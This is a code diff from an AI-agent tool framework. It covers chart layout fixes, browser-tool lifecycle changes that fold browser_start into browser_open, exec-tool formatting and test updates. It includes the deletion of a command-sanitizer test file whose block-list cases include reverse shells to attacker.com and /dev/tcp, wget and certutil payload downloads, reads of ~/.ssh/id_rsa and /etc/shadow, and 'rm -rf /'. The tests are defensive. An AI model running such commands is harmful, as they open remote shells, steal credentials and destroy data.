structured_data["open_graph"] = open_graph
result: dict[str, Any] = {
"url": url,
"final_url": base_url,
"title": title,
"description": description,
"content": text,
"length": len(text),
"page_type": page_type,
"content": sliced,
"length": len(sliced),
"offset": offset,
"total_length": total_length,
"truncated": truncated,
"next_offset": end if truncated else None,
"headings": headings,
}
# Extract links if requested
if structured_data:
result["structured_data"] = structured_data
if include_links:
links: list[dict[str, str]] = []
base_url = str(response.url) # Use final URL after redirects
for a in soup.find_all("a", href=True)[:50]:
href = a["href"]
# Convert relative URLs to absolute URLs
absolute_href = urljoin(base_url, href)
link_text = a.get_text(strip=True)
if link_text and absolute_href:
links.append({"text": link_text, "href": absolute_href})
result["links"] = links
return result
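The offset/truncation contract built above (clamped `offset`, three characters reserved for the ellipsis, `next_offset` only when truncated) can be sketched on its own. `slice_content` below simulates just that slicing step, not the full scraper:

```python
def slice_content(text: str, offset: int = 0, max_length: int = 50000) -> dict:
    """Mirror the documented pagination contract for an extracted-text blob."""
    total = len(text)
    offset = max(0, min(offset, total))  # clamp into [0, total]
    end = offset + max_length
    truncated = end < total
    sliced = text[offset:end]
    if truncated and len(sliced) >= 3:
        # Reserve 3 chars for the ellipsis so the slice stays within max_length.
        sliced = sliced[:-3] + "..."
    return {
        "content": sliced, "offset": offset, "total_length": total,
        "truncated": truncated, "next_offset": end if truncated else None,
    }

page = slice_content("abcdefghij", offset=0, max_length=5)
print(page["content"], page["next_offset"])  # ab... 5
rest = slice_content("abcdefghij", offset=5, max_length=5)
print(rest["content"], rest["truncated"])    # fghij False
```

One consequence worth noting when paginating: the three characters replaced by `...` in a truncated slice are not re-sent, since `next_offset` points past them, so a caller that wants byte-exact reassembly should re-request from `next_offset - 3`.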
@@ -29,11 +29,7 @@ def register_chart_tools(mcp: FastMCP) -> list[str]:
register_tools(mcp)
return [
name
for name in mcp._tool_manager._tools.keys()
if name.startswith("chart_")
]
return [name for name in mcp._tool_manager._tools.keys() if name.startswith("chart_")]
__all__ = ["register_chart_tools"]
@@ -247,9 +247,7 @@ async def _render_in_page(
# expected to have already coerced JSON-string specs into dicts
# in chart_tools/tools.py — this is a defense-in-depth check.
if isinstance(spec, str):
raise RendererError(
"spec arrived as a string; it should have been parsed to a dict in chart_render"
)
raise RendererError("spec arrived as a string; it should have been parsed to a dict in chart_render")
try:
json.dumps(spec)
except (TypeError, ValueError) as exc:
@@ -273,13 +271,60 @@ async def _render_in_page(
// data points are missing (the 2026-05-01 "all data
// points are gone" bug). We don't need animation in
// a static PNG anyway.
//
// Disjoint-region layout policy. ECharts has no auto-
// layout for component overlap (verified against the
// option reference): title/legend/grid are absolutely
// positioned and ignore each other. We enforce three
// non-overlapping regions:
// - Title: anchored to TOP (top:16, no bottom)
// - Legend: anchored to BOTTOM (bottom:16, no top)
// except when orient:'vertical' (side legend)
// - Grid: middle, with containLabel for axis labels
// Strips user-supplied vertical positions so an agent
// spec like `legend.top:"8%"` (which lands inside the
// title at chat-bubble dimensions, as in the 2026-05-01
// bug) can't collide. Horizontal anchoring (left/right)
// is preserved so e.g. left-aligned legends still work.
// Other fields (text, data, formatter, etc.) win as
// normal via Object.assign.
const userTitle = option.title || {};
const userLegend = option.legend;
const userGrid = option.grid || {};
const legendVertical = userLegend && userLegend.orient === 'vertical';
const stripV = (o) => {
const c = Object.assign({}, o);
delete c.top; delete c.bottom; return c;
};
const sanitized = Object.assign({}, option, {
animation: false,
animationDuration: 0,
animationDurationUpdate: 0,
animationEasing: 'linear',
animationEasingUpdate: 'linear',
title: Object.assign({left: 'center'}, stripV(userTitle), {top: 16}),
grid: Object.assign({left: 56, right: 56}, stripV(userGrid), {
// Force vertical bounds: user-supplied grid.top /
// grid.bottom (often percentage strings like "8%"
// that the agent picks at default dimensions) don't
// generalize across chat-bubble sizes. Bottom must
// clear bottom-anchored legend (~36px) plus xAxis
// name (containLabel handles tick labels but NOT
// axis names; that's outerBoundsMode in v6+, we're
// on v5). 96 with legend, 40 without.
top: 64,
bottom: userLegend && !legendVertical ? 96 : 40,
containLabel: true,
}),
});
if (userLegend) {
const legendDefaults = {
icon: 'roundRect', itemWidth: 12, itemHeight: 12, itemGap: 16,
};
sanitized.legend = legendVertical
? Object.assign(legendDefaults, userLegend)
: Object.assign(legendDefaults, stripV(userLegend), {bottom: 16});
}
// Signal "render complete" via window.__chartReady so
// the Python side knows when it's safe to screenshot.
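The merge policy in the hunk above relies on `Object.assign` merging left to right, so forced anchors placed last always win over user fields, which in turn win over defaults. A standalone sketch (hypothetical helper names, same shape as the title branch):

```javascript
// Strip user-supplied vertical anchors, then merge
// defaults < user fields < forced anchor.
const stripVertical = (component) => {
  const copy = Object.assign({}, component);
  delete copy.top;
  delete copy.bottom;
  return copy;
};

const sanitizeTitle = (userTitle) =>
  Object.assign({left: 'center'}, stripVertical(userTitle || {}), {top: 16});

const title = sanitizeTitle({text: 'Revenue', top: '8%', left: 'left'});
// title.top === 16 (forced anchor wins), title.left === 'left'
// (user field beats the default), title.text === 'Revenue' (untouched).
```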
+7 -8
View File
@@ -119,15 +119,15 @@ def build_theme(theme: str = "light") -> dict:
"axisTick": {"show": False},
"axisLabel": {"color": fg_muted, "fontSize": 11, "margin": 14},
"splitLine": {"lineStyle": {"color": grid_line, "type": "dashed"}},
# Y-axis name vertically-centered on the axis instead of
# floating in the upper-left corner where it competes with
# the title and legend.
"nameLocation": "middle",
"nameGap": 44,
"nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
"nameRotate": 90,
# Don't auto-rotate value-axis names — the theme can't tell
# xAxis (horizontal-bar) from yAxis (vertical-bar). Rotating
# both at 90° vertical-mounts the xAxis name on horizontal-
# bar charts and it collides with the legend (peer_val
# regression). Specs set nameRotate explicitly when needed.
},
# Same for log/time/etc. — keep the look consistent.
"logAxis": {
"axisLine": {"show": False},
"axisLabel": {"color": fg_muted, "fontSize": 11},
@@ -135,7 +135,6 @@ def build_theme(theme: str = "light") -> dict:
"nameLocation": "middle",
"nameGap": 44,
"nameTextStyle": {"color": fg_muted, "fontSize": 12, "fontWeight": 500},
"nameRotate": 90,
},
"timeAxis": {
"axisLine": {"show": True, "lineStyle": {"color": axis_line}},
@@ -169,8 +168,8 @@ def build_theme(theme: str = "light") -> dict:
# being CSS-hello-world green/red.
"candlestick": {
"itemStyle": {
"color": "#3d7a4a", # up body
"color0": "#a8453d", # down body
"color": "#3d7a4a", # up body
"color0": "#a8453d", # down body
"borderColor": "#3d7a4a",
"borderColor0": "#a8453d",
},
+1 -3
View File
@@ -174,9 +174,7 @@ def register_tools(mcp: FastMCP) -> None:
# browser-side flakes. We retry once for the latter; if
# the second attempt fails too, surface the error so the
# agent can fix it.
logger.warning(
"chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc
)
logger.warning("chart_render attempt %d/%d failed: %s", attempt + 1, 2, exc)
if attempt == 0:
await asyncio.sleep(0.15)
continue
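The retry shape in the hunk above (one retry after a short sleep, second failure surfaces) can be sketched as a small helper; `render` here is a hypothetical stand-in for the real render call:

```python
import asyncio

# Transient flakes get exactly one retry; a second failure
# propagates so the agent can see and fix the error.
async def render_with_retry(render, attempts=2, delay=0.15):
    for attempt in range(attempts):
        try:
            return await render()
        except Exception:
            if attempt == attempts - 1:
                raise
            await asyncio.sleep(delay)
```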
+1 -1
View File
@@ -41,7 +41,7 @@ def register_tools(mcp: FastMCP) -> None:
"""Register all GCU browser tools with the MCP server.
Tools are organized into categories:
- Lifecycle: browser_start, browser_stop, browser_status
- Lifecycle: browser_setup, browser_status, browser_stop (browser_open lazy-creates the context)
- Tabs: browser_tabs, browser_open, browser_close, browser_activate_tab
- Navigation: browser_navigate, browser_go_back, browser_go_forward, browser_reload
- Inspection: browser_screenshot, browser_snapshot, browser_console
+2 -2
View File
@@ -642,7 +642,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_snapshot", params, result=result)
return result
@@ -727,7 +727,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_html", params, result=result)
return result
+11 -11
View File
@@ -153,7 +153,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_click", params, result=result)
return result
@@ -247,7 +247,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_click_coordinate", params, result=result)
return _text_only(result)
@@ -352,7 +352,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_type", params, result=result)
return result
@@ -432,7 +432,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_type_focused", params, result=result)
return result
@@ -506,7 +506,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_press", params, result=result)
return result
@@ -560,7 +560,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_hover", params, result=result)
return result
@@ -627,7 +627,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_hover_coordinate", params, result=result)
return _text_only(result)
@@ -712,7 +712,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_press_at", params, result=result)
return _text_only(result)
@@ -782,7 +782,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_select", params, result=result)
return result
@@ -860,7 +860,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_scroll", params, result=result)
return result
@@ -924,7 +924,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_drag", params, result=result)
return result
+3 -60
View File
@@ -61,7 +61,7 @@ async def _ensure_context(
Lazy-creates the browser context (tab group + seed tab) the first time
a profile is used so URL-taking tools (``browser_open`` /
``browser_navigate``) can be the agent's single cold-start entry
point instead of forcing an explicit ``browser_start`` round trip.
point; no separate "start" tool to remember.
Caller must verify ``bridge`` is connected first; any failure in
``bridge.create_context`` propagates so the caller's existing
@@ -137,7 +137,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
return {
"ok": True,
"connected": True,
"status": "Extension is connected and ready. Call browser_start to begin.",
"status": "Extension is connected and ready. Call browser_open(url) to begin.",
}
return {
@@ -150,7 +150,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
"step_3": "Click 'Load unpacked'",
"step_4": f"Select this directory: {ext_path}",
"step_5": ("Click the extension icon in the Chrome toolbar to confirm it says 'Connected'"),
"step_6": "Return here and call browser_start",
"step_6": "Return here and call browser_open(url) to begin",
},
"extensionPath": ext_path,
"extensionPathExists": ext_exists,
@@ -238,63 +238,6 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
)
return result
@mcp.tool()
async def browser_start(profile: str | None = None) -> dict:
"""
Explicitly create a browser context (tab group) for ``profile``.
Most workflows do NOT need to call this directly: ``browser_open``
and ``browser_navigate`` lazy-create a context on first use, so a
single ``browser_open(url)`` covers the cold path. Reach for
``browser_start`` when you want to (a) warm a profile without
opening a URL yet, or (b) recreate a context after
``browser_stop`` to clear stale state.
No separate browser process is launched; this uses the user's
existing Chrome via the Beeline extension.
Args:
profile: Browser profile name (default: "default")
Returns:
Dict with start status (``"started"`` on fresh creation,
``"already_running"`` when a context for the profile exists),
including ``groupId`` and ``activeTabId``.
"""
start = time.perf_counter()
params = {"profile": profile}
bridge = get_bridge()
if not bridge or not bridge.is_connected:
result = {
"ok": False,
"error": ("Browser extension not connected. Call browser_setup for installation instructions."),
}
log_tool_call("browser_start", params, result=result)
return result
try:
profile_name, ctx, created = await _ensure_context(bridge, profile)
result = {
"ok": True,
"status": "started" if created else "already_running",
"profile": profile_name,
"groupId": ctx.get("groupId"),
"activeTabId": ctx.get("activeTabId"),
}
log_tool_call(
"browser_start",
params,
result=result,
duration_ms=(time.perf_counter() - start) * 1000,
)
return result
except Exception as e:
logger.exception("Failed to start browser context")
result = {"ok": False, "error": str(e)}
log_tool_call("browser_start", params, error=e, duration_ms=(time.perf_counter() - start) * 1000)
return result
@mcp.tool()
async def browser_stop(profile: str | None = None) -> dict:
"""
+7 -8
View File
@@ -33,11 +33,10 @@ def register_navigation_tools(mcp: FastMCP) -> None:
"""
Navigate a tab to a URL.
Lazy-creates a browser context if none exists (no need to call
``browser_start`` first); when no ``tab_id`` is given and the
context was just created, navigation lands on the seed tab.
Prefer ``browser_open`` when you specifically want a new tab;
``browser_navigate`` is for redirecting an existing tab.
Lazy-creates a browser context if none exists; when no ``tab_id``
is given and the context was just created, navigation lands on
the seed tab. Prefer ``browser_open`` when you specifically want
a new tab; ``browser_navigate`` is for redirecting an existing tab.
Waits for the page to reach the ``wait_until`` condition before
returning.
@@ -130,7 +129,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_go_back", params, result=result)
return result
@@ -180,7 +179,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_go_forward", params, result=result)
return result
@@ -235,7 +234,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_reload", params, result=result)
return result
+9 -9
View File
@@ -65,7 +65,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_tabs", params, result=result)
return result
@@ -100,12 +100,12 @@ def register_tab_tools(mcp: FastMCP) -> None:
"""
Open a browser tab at the given URL (preferred entry point).
This is the agent's primary "go to a page" tool. If no browser
context exists yet for the profile, one is created transparently
(no need to call ``browser_start`` first). The first call after
a fresh context reuses the seed ``about:blank`` tab; subsequent
calls open new tabs in the agent's tab group. Waits for the
page to load before returning.
This is the agent's primary "go to a page" tool and the cold-start
entry point: if no browser context exists yet for the profile,
one is created transparently. The first call after a fresh
context reuses the seed ``about:blank`` tab; subsequent calls
open new tabs in the agent's tab group. Waits for the page to
load before returning.
Args:
url: URL to navigate to
@@ -192,7 +192,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_close", params, result=result)
return result
@@ -271,7 +271,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_activate_tab", params, result=result)
return result
@@ -71,17 +71,10 @@ def build_exec_envelope(
# the foundational skill documents). For simplicity we always
# store both when either overflows so the agent can fetch the
# other stream in full too if it wants.
combined = (
b"--- stdout ---\n"
+ stdout_bytes
+ b"\n--- stderr ---\n"
+ stderr_bytes
)
combined = b"--- stdout ---\n" + stdout_bytes + b"\n--- stderr ---\n" + stderr_bytes
output_handle = store.put(combined)
semantic_status, semantic_message = classify(
command, exit_code, timed_out=timed_out, signaled=signaled
)
semantic_status, semantic_message = classify(command, exit_code, timed_out=timed_out, signaled=signaled)
warning = get_warning(command)
+3 -4
View File
@@ -53,9 +53,7 @@ if TYPE_CHECKING:
# directly — the alternative is spawning the first program with the rest
# of the line as junk argv, which either errors or returns fake success
# (e.g. `echo "..." && ps ...` → echo prints the literal command).
_SHELL_METACHARS: frozenset[str] = frozenset(
{"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"}
)
_SHELL_METACHARS: frozenset[str] = frozenset({"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"})
def register_exec_tools(mcp: FastMCP) -> None:
@@ -126,7 +124,8 @@ def register_exec_tools(mcp: FastMCP) -> None:
return _err_envelope(command, "command was empty")
if any(t in _SHELL_METACHARS for t in tokens) or any(
# globs that shlex left unexpanded (`*`, `?`, `[`)
any(c in t for c in "*?[") and t != "[" for t in tokens
any(c in t for c in "*?[") and t != "["
for t in tokens
):
auto_shell = True
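The auto-shell heuristic in the hunk above routes a command through a real shell when its tokens contain metacharacters or unexpanded globs. A simplified, self-contained sketch (names assumed; `shlex` in POSIX mode keeps `&&`, `|`, etc. as their own tokens):

```python
import shlex

METACHARS = {"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"}

def needs_shell(command: str) -> bool:
    tokens = shlex.split(command, posix=True)
    if any(t in METACHARS for t in tokens):
        return True
    # Globs shlex left unexpanded (`*`, `?`, `[`); a bare `[` is the
    # POSIX test builtin, not a glob, so it is excluded.
    return any(any(c in t for c in "*?[") and t != "[" for t in tokens)
```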
+11 -17
View File
@@ -20,7 +20,6 @@ from gcu.browser.bridge import BeelineBridge
from gcu.browser.tools.advanced import register_advanced_tools
from gcu.browser.tools.inspection import register_inspection_tools
from gcu.browser.tools.interactions import register_interaction_tools
from gcu.browser.tools.lifecycle import register_lifecycle_tools
from gcu.browser.tools.navigation import register_navigation_tools
from gcu.browser.tools.tabs import register_tab_tools
@@ -107,22 +106,17 @@ class TestMultipleSubagentsTabGroups:
mock_bridge.create_context = AsyncMock(side_effect=mock_create_context)
# Register tools first
register_lifecycle_tools(mcp)
browser_start = mcp._tool_manager._tools["browser_start"].fn
from gcu.browser.tools.lifecycle import _ensure_context
# Now patch for execution
with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
# Simulate 3 different subagents starting browsers
results = await asyncio.gather(
browser_start(profile="agent_1"),
browser_start(profile="agent_2"),
browser_start(profile="agent_3"),
)
results = await asyncio.gather(
_ensure_context(mock_bridge, "agent_1"),
_ensure_context(mock_bridge, "agent_2"),
_ensure_context(mock_bridge, "agent_3"),
)
# Each should have created a separate context
assert mock_bridge.create_context.call_count == 3
assert all(r.get("ok") for r in results)
assert all(created for (_, _, created) in results)
@pytest.mark.asyncio
async def test_concurrent_tab_operations_different_groups(self, mcp: FastMCP, mock_bridge: MagicMock):
@@ -709,11 +703,11 @@ class TestErrorHandling:
mock_bridge = MagicMock(spec=BeelineBridge)
mock_bridge.is_connected = False
register_lifecycle_tools(mcp)
browser_start = mcp._tool_manager._tools["browser_start"].fn
register_tab_tools(mcp)
browser_open = mcp._tool_manager._tools["browser_open"].fn
with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
result = await browser_start(profile="test")
with patch("gcu.browser.tools.tabs.get_bridge", return_value=mock_bridge):
result = await browser_open(url="https://example.com", profile="test")
assert result.get("ok") is False
assert "not connected" in result.get("error", "").lower()
+1 -3
View File
@@ -20,9 +20,7 @@ def test_register_chart_tools_lands_all(mcp):
from chart_tools import register_chart_tools
names = register_chart_tools(mcp)
assert set(names) == EXPECTED_TOOLS, (
f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
)
assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
def test_all_tools_have_chart_prefix(mcp):
-238
View File
@@ -1,238 +0,0 @@
"""Tests for command_sanitizer — validates that dangerous commands are blocked
while normal development commands pass through unmodified."""
import pytest
from aden_tools.tools.file_system_toolkits.command_sanitizer import (
CommandBlockedError,
validate_command,
)
# ---------------------------------------------------------------------------
# Safe commands that MUST pass validation
# ---------------------------------------------------------------------------
class TestSafeCommands:
"""Common dev commands that should never be blocked."""
@pytest.mark.parametrize(
"cmd",
[
"echo hello",
"echo 'Hello World'",
"uv run pytest tests/ -v",
"uv pip install requests",
"git status",
"git diff --cached",
"git log -n 5",
"git add .",
"git commit -m 'fix: typo'",
"python script.py",
"python -m pytest",
"python3 script.py",
"python manage.py migrate",
"ls -la",
"dir /a",
"cat README.md",
"head -n 20 file.py",
"tail -f log.txt",
"grep -r 'pattern' src/",
"find . -name '*.py'",
"ruff check .",
"ruff format --check .",
"mypy src/",
"npm install",
"npm run build",
"npm test",
"node server.js",
"make test",
"make check",
"cargo build",
"go build ./...",
"dotnet build",
"pip install -r requirements.txt",
"cd src && ls",
"echo hello && echo world",
"cat file.py | grep pattern",
"pytest tests/ -v --tb=short",
"rm temp.txt",
"rm -f temp.log",
"del temp.txt",
"mkdir -p output/logs",
"cp file1.py file2.py",
"mv old.txt new.txt",
"wc -l *.py",
"sort output.txt",
"diff file1.py file2.py",
"tree src/",
"curl https://api.example.com/data",
"curl -X POST -H 'Content-Type: application/json' https://api.example.com",
],
)
def test_safe_command_passes(self, cmd):
"""Should not raise for common dev commands."""
validate_command(cmd) # should not raise
def test_empty_command(self):
"""Empty and whitespace-only commands should pass."""
validate_command("")
validate_command(" ")
validate_command(None) # type: ignore[arg-type] — edge case
# ---------------------------------------------------------------------------
# Dangerous commands that MUST be blocked
# ---------------------------------------------------------------------------
class TestBlockedExecutables:
"""Commands using blocked executables should raise CommandBlockedError."""
@pytest.mark.parametrize(
"cmd",
[
# Network exfiltration
"wget http://evil.com/payload",
"nc -e /bin/sh attacker.com 4444",
"ncat attacker.com 1234",
"nmap -sS 192.168.1.0/24",
"ssh user@remote",
"scp file.txt user@remote:/tmp/",
"ftp ftp.example.com",
"telnet example.com 80",
"rsync -avz . user@remote:/data",
# Windows network tools
"invoke-webrequest https://evil.com",
"iwr https://evil.com",
"certutil -urlcache -split -f http://evil.com/payload",
# User escalation
"useradd hacker",
"userdel admin",
"adduser hacker",
"passwd root",
"net user hacker P@ss123 /add",
"net localgroup administrators hacker /add",
# System destructive
"shutdown /s /t 0",
"reboot",
"halt",
"poweroff",
"mkfs.ext4 /dev/sda1",
"diskpart",
# Shell interpreters (direct invocation)
"bash -c 'echo hacked'",
"sh -c 'rm -rf /'",
"powershell -Command Get-Process",
"pwsh -c 'ls'",
"cmd /c dir",
"cmd.exe /c dir",
],
)
def test_blocked_executable(self, cmd):
"""Should raise CommandBlockedError for dangerous executables."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestBlockedPatterns:
"""Commands matching dangerous patterns should be blocked."""
@pytest.mark.parametrize(
"cmd",
[
# Recursive delete of root / home
"rm -rf /",
"rm -rf ~",
"rm -rf ..",
"rm -rf C:\\",
"rm -f -r /",
# sudo
"sudo apt install something",
"sudo rm -rf /var/log",
# Reverse shell indicators
"bash -i >& /dev/tcp/10.0.0.1/4444",
# Credential theft
"cat ~/.ssh/id_rsa",
"cat /etc/shadow",
"cat something/credential_key",
"type something\\credential_key",
# Command substitution with dangerous tools
"echo `wget http://evil.com`",
# Environment variable exfiltration
"echo $API_KEY",
"echo ${SECRET_TOKEN}",
],
)
def test_blocked_pattern(self, cmd):
"""Should raise CommandBlockedError for dangerous patterns."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestChainedCommands:
"""Dangerous commands hidden in compound statements should be caught."""
@pytest.mark.parametrize(
"cmd",
[
"echo hi && wget http://evil.com/payload",
"echo hi || ssh attacker@remote",
"ls | nc attacker.com 4444",
"echo safe; bash -c 'evil stuff'",
"git status; shutdown /s /t 0",
],
)
def test_chained_dangerous_command(self, cmd):
"""Dangerous commands chained with safe ones should be blocked."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestEdgeCases:
"""Edge cases and possible bypass attempts."""
def test_env_var_prefix_does_not_bypass(self):
"""FOO=bar wget ... should still be blocked."""
with pytest.raises(CommandBlockedError):
validate_command("FOO=bar wget http://evil.com")
@pytest.mark.parametrize(
"cmd",
[
"/usr/bin/wget https://attacker.com",
"C:\\Windows\\System32\\cmd.exe /c dir",
],
)
def test_directory_prefix_does_not_bypass(self, cmd):
"""Absolute executable paths should still match the blocklist."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
def test_case_insensitive_blocking(self):
"""Blocking should be case-insensitive."""
with pytest.raises(CommandBlockedError):
validate_command("Wget http://evil.com")
def test_exe_suffix_stripped(self):
"""cmd.exe should be blocked same as cmd."""
with pytest.raises(CommandBlockedError):
validate_command("cmd.exe /c dir")
def test_safe_rm_without_dangerous_target(self):
"""rm of a specific file (not root/home) should pass."""
validate_command("rm temp.txt")
validate_command("rm -f output.log")
def test_python_commands_are_safe(self):
"""python commands (including -c) are allowed for agent scripting."""
validate_command("python script.py")
validate_command("python -m pytest tests/")
validate_command("python3 -c 'print(1)'")
validate_command("python -c 'import json; print(json.dumps({}))'")
validate_command("node -e 'console.log(1)'")
def test_error_message_is_descriptive(self):
"""Blocked commands should include a useful error message."""
with pytest.raises(CommandBlockedError, match="blocked for safety"):
validate_command("wget http://evil.com")
+7 -8
View File
@@ -2,8 +2,8 @@
These tests cover the stale-edit guard added for Gap 4:
- read_file records a per-file hash snapshot
- edit_file / write_file / hashline_edit refuse to run when the on-disk
file has diverged from the last recorded read
- edit_file / write_file refuse to run when the on-disk file has
diverged from the last recorded read
- write_file is allowed without a prior read when the target doesn't
exist yet (brand-new file, nothing to clobber)
- re-recording after a successful write keeps chained edits working
@@ -52,7 +52,6 @@ def tools(sandbox: Path):
"read_file": _find_tool(mcp, "read_file"),
"write_file": _find_tool(mcp, "write_file"),
"edit_file": _find_tool(mcp, "edit_file"),
"hashline_edit": _find_tool(mcp, "hashline_edit"),
}
@@ -129,7 +128,7 @@ def test_edit_file_refuses_without_prior_read(sandbox: Path, tools):
# Clear the cache first so there's definitely no recorded read.
file_state_cache.reset_all()
result = tools["edit_file"]("e.py", "hello", "world")
result = tools["edit_file"]("replace", "e.py", "hello", "world")
assert "Refusing to edit" in result
assert "read_file" in result
@@ -140,7 +139,7 @@ def test_edit_file_proceeds_after_read(sandbox: Path, tools):
file_state_cache.reset_all()
tools["read_file"]("f.py")
result = tools["edit_file"]("f.py", "hello", "world")
result = tools["edit_file"]("replace", "f.py", "hello", "world")
assert "Replaced" in result
assert target.read_text() == "print('world')\n"
@@ -157,7 +156,7 @@ def test_edit_file_refuses_when_file_changed_between_read_and_edit(sandbox: Path
target.write_text("print('bye')\n")
os.utime(str(target), None)
result = tools["edit_file"]("g.py", "hello", "world")
result = tools["edit_file"]("replace", "g.py", "hello", "world")
assert "Refusing to edit" in result
assert "Re-read" in result
@@ -185,10 +184,10 @@ def test_chained_edits_in_same_turn_do_not_self_invalidate(sandbox: Path, tools)
file_state_cache.reset_all()
tools["read_file"]("chained.py")
r1 = tools["edit_file"]("chained.py", "a", "A")
r1 = tools["edit_file"]("replace", "chained.py", "a", "A")
assert "Replaced" in r1
# Immediate second edit must NOT trip the stale guard because
# edit_file re-records the post-write state.
r2 = tools["edit_file"]("chained.py", "b", "B")
r2 = tools["edit_file"]("replace", "chained.py", "b", "B")
assert "Replaced" in r2
assert target.read_text() == "print('A')\nprint('B')\n"
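The stale-edit guard these tests exercise follows a record-then-compare shape: reading a file records a content hash, and an edit is refused when the on-disk bytes have diverged. A minimal sketch of that shape (hypothetical cache layout, not the framework's actual `file_state_cache` API):

```python
import hashlib

_snapshots: dict[str, str] = {}

def record_read(path: str, data: bytes) -> None:
    # Called after read_file (and re-called after a successful write,
    # which is what keeps chained edits from self-invalidating).
    _snapshots[path] = hashlib.sha256(data).hexdigest()

def is_fresh(path: str, data: bytes) -> bool:
    # An edit proceeds only when the current on-disk content matches
    # the last recorded read.
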